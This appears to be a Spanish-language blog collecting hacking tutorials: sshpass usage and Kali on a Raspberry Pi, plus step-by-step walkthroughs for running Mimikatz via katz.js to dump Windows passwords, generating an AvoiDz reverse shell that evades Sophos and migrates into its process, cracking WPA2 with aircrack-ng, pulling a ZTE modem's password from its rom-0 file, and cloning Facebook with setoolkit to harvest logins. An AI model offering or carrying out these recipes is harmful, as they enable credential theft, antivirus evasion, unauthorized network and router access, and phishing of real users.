Conectar con SSH sin clave pública/privada - SSHpass

Qué es SSHpass:

     Cuando utilizamos SSH para conectarnos de un servidor a otro utilizamos un usuario y una contraseña.
   
     Usualmente podemos generar un par de claves pública y privada para que no nos solicite la contraseña. En el caso que no deseemos utilizar estas claves podremos utilizar el SSHPASS que nos servirá para pasar la contraseña por parámetro.

     Esta herramienta podemos utilizarla por ejemplo para poner dentro de scripts sin que tener que configurar las keys SSH.

     También explicaré como utilizar GPG para encriptar la clave y que no quede en texto plano en un archivo.

Instalar el sshpass:

root@debian:~# apt-get install sshpass

Ingresar pasando el password sin tener keys ssh:

root@debian:~# sshpass -p 'Mi_password' ssh 192.168.0.200

Poner la clave dentro de un archivo:

root@debian:~# echo 'Mi_password' > pass.txt
root@debian:~# sshpass -f pass.txt ssh 192.168.0.200

Tener en cuenta para darle permisos de lectura solo al owner, para que nadie más pueda leer la clave.

root@debian:~# chmod 0400 pass.txt

Encriptar el archivo de contraseña con gpg:

root@debian:~# gpg -c pass.txt

Ingresamos una passphrase que nos solicita y la confirmamos. Esto nos genera un archivo .gpg

root@debian:~# ls -lat pass.txt.gpg
-rw-r--r-- 1 root root 94 ene  2 11:15 pass.txt.gpg

Eliminamos el que no está encriptado:

root@debian:~# rm -rf pass.txt

Usamos el sshpass con la clave encriptada:

root@debian:~# gpg -d -q pass.txt.gpg > pass.txt; sshpass -f pass.txt ssh 192.168.0.200; rm pass.txt

Mimikatz Indetectable

Leí por ahí lo fácil que era usar Mimikatz, pero era detectado por cualquier antivirus. Buscando un poco me topé con que hay una versión en Java Script que es indetectable. 

Descargamos el katz.js del siguiente enlace:
https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f/archive/2adcc9d2570b4367c6cc405e5a5969863d04fc9b.zip

Lo ejecutamos simplemente con el siguiente comando y esperamos unos minutos:

c:\> cscript katz.js

Finalmente ejecutamos estos dos comandos:

privilege::debug

sekurlsa::logonpasswords

Y obtendremos los usuarios, el dominio y sus contraseñas:

FUENTE: https://github.com/gentilkiwi/mimikatz

Reverse Shell Indetectable por Sophos con AvoiDz

En la versión de Kali que fue probado:

El windows que fue "Atacado" es: 

Descargamos el AvoiDz de gitHub:

cd Desktop/
git clone https://github.com/M4sc3r4n0/avoidz.git
cd avoidz
chmod +x setup.sh
./setup.sh

Verifica las dependencias, las que no tenga las instala:

Ejecutamos sin parametros para ver las opciones:

./avoidz.rb

Ejecutamos lo siguiente especificando la ip en el valor -h esperamos que genere el payload y al final le damos si con la opción Y como muestra la imagen. Tener en cuenta que esto sí o si hay que ejecutarlo desde el entorno gráfico, ya que si lo ejecutamos por ssh no funcionará.

./avoidz.rb -h 'ifconfig eth0 | grep inet | awk {'print $2'}' -f py

Se abre automáticamente la siguiente ventana al darle Y en la pantalla anterior:

El py.exe generado lo copiamos al windows mediante winSCP ó cualquier otro programa para pasar archivos de linux a linux.

Vemos que al ejecutar el py.exe en el windows no lo detecta como virus el antivirus. En el kali vemos que abre la conexión, vemos en la siguiente imagen, ejecutamos los siguientes comandos para ver las sesiones y conectarnos:

sessions
session 1

Ejecutamos sysinfo desde el meterpreter y vemos que estamos conectado al windows:

sysinfo

Vemos los procesos corriendo en el windows:

ps

Vemos el pid del Sophos en la primer columna 5824:

Para migrar el proceso del shell reverso que vemos como PowerShell lo migraremos al PID del sophos:

migrate 5824

También vemos de escanearlo con el antivirus:

No detecta ningún virus:

La versión es la del 2017 actualizada al día de hoy:

Hacking WPA y WPA2 por Fuerza Bruta desde MacOS

Escaneamos con airport para detectar todas las wifi disponibles. La que aparece en rojo es mi WiFi que intentaré romper:

MacBook:~ root# /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
                            SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
                   Speedy-B00FE4 f8:8f:97:b0:0f:ed -76  1       N  -- WEP
                   Speedy-CB6F98 e0:19:1d:cb:6f:a0 -57  1       Y  AR WPA(PSK/TKIP,AES/TKIP) WPA2(PSK/TKIP,AES/TKIP)
                       Btzl-wifi 00:e0:4d:80:d2:94 -73  9       N  -- WPA(PSK/TKIP/TKIP)
                           Jotan a4:2b:b0:d7:69:50 -59  10,-1   Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)
                           Mi_Wifi c9:d6:fe:7d:ef:a8 -39  6       N  -- WPA2(PSK/TKIP/TKIP) 

En el comando previo obtenemos el canal de la wifi WPA2 que queremos romper (canal 6). El en0 es el nombre de la interface wifi de mi mac. Lo dejamos corriendo para que capture:

MacBook:~ root# /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6
Capturing 802.11 frames on en0.

Abrimos otra terminal mientras y dejamos pingueamos a cualquier ip para generar tráfico:

MacBook:~ root# ping 8.8.8.8
Request timeout for icmp_seq 135
ping: sendto: No route to host
Request timeout for icmp_seq 136
ping: sendto: No route to host

Creamos la lista de posibles password, obviamente que yo puse la mía que sabía que era, si no la conocemos tenemos que bajar alguna wordlist de internet ó generar todas las posibles combinaciones con algun programa. Yo puse pocos password para que finalice rápido el proceso.

MacBook:~ root# vi wordlist.lst
algo
alguna
Cualquiera
laClaveWifi
Admin
password
pass
1234
….
clave

Empezamos a romper usando fuerza bruta desde la lista de posibles contraseñas (wordlist.lst), luego del -b pondremos el BSSID de la wifi elegida para romper y por último parámetro indicamos el archivo .cap que fue generado con el airport (2 comando ejecutado).

MacBook:~ root# aircrack-ng -w wordlist.lst -b c9:d6:fe:7d:ef:a8 /tmp/airportSniffC5nL70.cap
Opening /tmp/airportSniffC5nL70.cap
Reading packets, please wait...
                                 Aircrack-ng 1.1
                   [00:00:00] 4 keys tested (280.31 k/s)
                          KEY FOUND! [ laClaveWifi ]

Cuando aparece KEY FOUND ya tenemos la clave, es la que aparece entre corchetes, en este caso es: laClaveWifi

Se pueden bajar wordlist de varios lugares, por ejemplo acá les dejo una en español para que prueben: https://packetstormsecurity.com/files/download/32018/spanish.gz ó de cualquier idioma: https://packetstormsecurity.com/Crackers/wordlists/language/

Configurando WiFi en Raspberri Pi con Adaptador USB Philips

1) Prendemos la raspberry pi con el cable de red conectado.

2) Una vez que booteó nos conectamos por ssh por la ip que nos dió.

3) Insertamos el adaptador wifi philips y vemos si lo detecta el S.O.

root@kali:~# lsusb

4) Editamos el archivo de configuración

root@kali:~# vi /etc/network/interfaces

Y ponemos lo siguiente para configurarla, reemplazando Mi_Nombre_de_la_Red por el SSID (nombre de la wifi a conectar)
Y cambiar Mi_Nombre_de_la_Red por la clave con la cual nos conectamos a la wifi. Dejar las comillas:

auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-ssid "Mi_Nombre_de_la_Red"
wpa-psk "La_clave_para_Conectar"

5) Reiniciamos el demonio de red:

root@kali:~# /etc/init.d/networking restart

6) Una vez que reinició, desconectamos el cable de red (no lo volvemos a enchufar).

7) Desconectamos el cable de alimentación y volvemos a conectarlo.

8) Cuando finalizó el booteo vemos que ya linkea la luz del adaptador wifi.

9) Nos conectamos por ssh por la ip que nos dió fijandonos en el modem/router ó vamos pingueando hasta que alguna ip nos responda ó lo escaneamos con nmap.

10) Si queremos ponerle ip fija:

root@kali:~# vi /etc/network/interfaces

auto wlan0
#allow-hotplug wlan0
#iface wlan0 inet dhcp
iface wlan0 inet static
address 192.168.1.43
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1
wpa-ssid "Nombre_Wifi"
wpa-psk "Contraseña"

root@kali:~# /etc/init.d/networking restart

Instalando Kali Linux en Raspberry Pi

Antes que nada prepararé la imagen booteable en una SD de 16Gb desde Windows 7:


1) Conectamos la tarjeta de memoria SD en una pc con windows 7, no es necesario formatearla.


2) Descargamos el Win32diskimagen y lo instalamos en windows, la instalación es tan compleja, como dar siguiente, siguiente, siguiente. Lo descargamos del siguiente enlace:  https://sourceforge.net/projects/win32diskimager/files/latest/download


3) Descargamos la imagen de kali para raspberry pi de: https://www.offensive-security.com/kali-linux-arm-images/ Yo me descargué esta:

kali-2.1.2-rpi.img.xz  => https://images.offensive-security.com/arm-images/kali-2.1.2-rpi.img.xz

        Ya que tengo este modelo para probar:

4) La descomprimi con el winrar y queda el file: kali-2.1.2-rpi.img

5)  Abrimos el Win32DiskImager y seleccionamos la imagen que descomprimimos en el punto anterior y seleccionamos la unidad que tomó la tarjeta SD, en mi caso el H:\, clickeamos en write:

Verificamos que realmente la ruta donde queremos escribir y click en yes:

Luego ok y exit. Ya tenemos la memoria con el booteable de kali:

6) Ponemos la memoria SD en el raspberry, le conectamos un cable de red. Para darle energía conectamos una punta del cable usb de un cargador de celular al 5v/1ADDC y la otra punta al USB de la compu.

     Si vemos que prenden las luces roja y verde es que está booteando correctamente.

     Cuando terminó de bootear vemos que quedan las 4 luces prendidas, naranja, verde, verde y roja.

7) Como se que ip tomó? 

     Desde otro linux que tengo corriendo en un virtualbox ejecutamos un barrido con nmap:

root@linuxillo:~# nmap -sP 192.168.1.0-255 | grep -2 Raspberry | head -1

     Obtendremos la dirección ip del dispositivo, al cual nos conectaremos por ssh por putty con:

usuario:     root

password:  toor

     También podríamos conectarnos al modem y ver que ip asignó el DHCP por su mac.

8) Como me conecto si no tengo monitor para conectarle?

Instalamos VNC server:

root@kali:~# apt-get update

root@kali:~# apt-get install x11vnc
Do you want to continue? [Y/n] Y

root@kali:~# x11vnc -storepasswd
Enter VNC password:
Verify password:
Write password to /root/.vnc/passwd?  [y]/n y
Password written to: /root/.vnc/passwd
root@kali:~#

root@kali:~# x11vnc -ncache q0 -auth guess -nap -forever -loop -repeat -rfbauth /root/.vnc/passwd -rfbport 5900

 Nos logueamos con el vncviewer desde el windows ó desde el plugin del chrome:

Ingresamos la ip del kali y la sesión que nos mostró por pantalla al iniciar el x11vnc:

Tildamos la opción y le damos connect:

Ingresamos el password que seteamos para el vnc cuando ejecutamos el -storepasswd y damos ok:

Nos logueamos con la mismos datos que ingresamos por ssh: root y toor:

Y taraaaaaaaaan, tenemos el Kali corriendo en el Raspberry pi sin monitor:

Ingresar al Modem de Speedy ZTE

Fue probado en el modem con las siguientes características:

     Marca: ZTE

     Modelo: ZXV10 W300

     Versión de firmware: W300V3.1.0a_DR0_AR

Esto puede hacerse tanto desde la ip interna como desde la ip pública, lo probé de ambas. Ahora lo voy a mostrar desde la ip interna.

Como obtenemos la ip del modem? => Inicio => Ejecutar => cmd => ipconfig /all | find "Puerta":

Ingresamos desde el navegador ingresando a la ip del modem:

Nos descargamos la rom desde la url poniendo en el navegador: http://192.168.1.1/rom-0

Ingresamos en esta url: http://www.routerpwn.com/zynos/ seleccionamos el archivo rom-0 que descargamos, completamos el captcha y hacemos click en "Unpack rom-0"

Nos devuelve lo siguiente con la clave:

Volvemos a ingresar al modem ingresando sólo la ip, seleccionamos "Configuración Avanzada":

Ingresamos usuario y la clave:

Y ya estamos dentro:

Pishing de un Sitio Web

Voy a mostrar lo fácil que es falsificar un sitio web para que tengan cuidado cuando nos pasan un link el cuál pide usuario y contraseña.

Empezamos explicando que es el pishing: 

Phishing o suplantación de identidad es un término informático que denomina un modelo de abuso informático y que se comete mediante el uso de un tipo de ingeniería social, caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña, información detallada sobre tarjetas de crédito u otra información bancaria). El cibercriminal, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas.^{1 FUENTE: https://es.wikipedia.org/wiki/Phishing}

Este instructivo fue realizado en un laboratorio, no se recomienda hacerlo fuera de este ámbito ya que en varios países es ilegal y está penado por la ley.

Mostraremos como falsificar el sitio de facebook, obviamente que es aplicable a cualquier otra web.

Fue realizado con Kali Linux virtualizado con Virtual Box.

1) Verificamos la ip del kali (equipo en el cual haremos la falsificación), ejecutamos ifconfig. En este caso obtenemos la ip: 192.168.1.43:

2) Utilizamos la herramienta setoolkit, cuando nos muestar el siguiente mensaje damos ENTER:

3) Seleccionamos la primer opción presionando 1, es: Ataque de ingeniería social:

4) Web site Attack Vector eligiendo esta vez la opción: 2

5) Ahora la opción: 3

6) Clomanos el sitio con la opción: 2

7) Vemos que nos pide que ingresemos la dirección ip del servidor donde clonaremos el sitio, la ip la obtuvimos al principio y es la: 192.168.1.43

 8) Ahora nos pide que ingresemos la url del sitio web que queremos clonar, en este caso es: http://www.facebook.com y luego nos indica que el servidor web apache no está iniciado, damos Y para iniciarlo:

9) Nos que en la ruta: /var/www/html descargará el sitio clonado:

10) Vamos tocando 99 y enter la cantidad de veces que indique para salir del setoolkit:

11) Supuestamente nos pasan esta url para robarnos el usuario y contraseña. Nos logueamos pensando que es facebook si no prestamos atención en la barra de direccion:

12) No hizo absolutamente nada, como que no lo tomó correctamente y nos redirecciona al verdadero sitio de facebook:

13) Vamos a la ruta donde descargó la web clonada y nos habrá generado un archivo llamdao: harvester_fecha_y_hora.txt donde veremos el usuario y contraseña.

En mi caso el usuario que ingresé fue: pongo_mi_user@yahoo.com y la clave fue: MiClave. La vemos correctamente dentro de dicho archivo:

Obviamente que es para gente novata, ya que en la url no aparece, pero también es muy simple cambiar la ip por www.facebook.com haciendo tecnicas de "DNS Spoofing" y/o "Envenenamientos ARP".